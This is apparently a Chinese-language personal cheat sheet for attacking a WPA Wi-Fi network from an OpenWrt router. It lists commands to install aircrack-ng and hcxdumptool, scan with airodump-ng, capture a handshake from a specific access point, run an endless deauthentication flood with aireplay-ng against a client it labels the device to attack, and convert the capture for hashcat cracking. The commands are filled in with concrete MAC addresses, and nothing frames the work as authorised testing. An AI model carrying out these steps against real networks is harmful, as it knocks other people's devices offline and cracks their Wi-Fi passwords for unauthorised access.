===================================================================
安装openwrt airman-ng
# opkg update
# opkg install aircrack-ng airmon-ng hcxdumptool
===================================================================
第一步
设置将路由器网卡设为监听状态
===================================================================
第二步
iwconfig
airodump-ng wlan0

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
粘贴扫到的Wif
                                                  


===================================================================
第三步
airodump-ng -c 信道 --bssid BSSID -w 要保存的文件名 网卡名
如果airodump-ng出现[ WPA handshake XX:XX:XX:XX:XX:XX ]提示则握手包已抓到
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
粘贴扫到的Wifi
airodump-ng -c 11 --bssid 44:9D:89:46:3D:39 -w /tmp/tmp/cap wlan0

===================================================================
第四步
aireplay-ng -0 0 -a 热点MAC            -c 设备MAC           wlan0
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
粘贴扫到要攻击的设备



+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
粘贴要攻击的设备
aireplay-ng -0 0 -a 44:9D:89:46:3D:39 -c 84:BE:52:7C:F3:35 wlan0

===================================================================
第五步：转换握手包
这个教程跑包用hashcat，需要对WPA握手包转换一下，转换为hashcat -m 22000格式的握手包
# hcxpcapngtool -o 转换的握手包名 原握手包名.cap
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
hcxpcapngtool -o tmp.txt tmp-05.cap



hcxdumptool
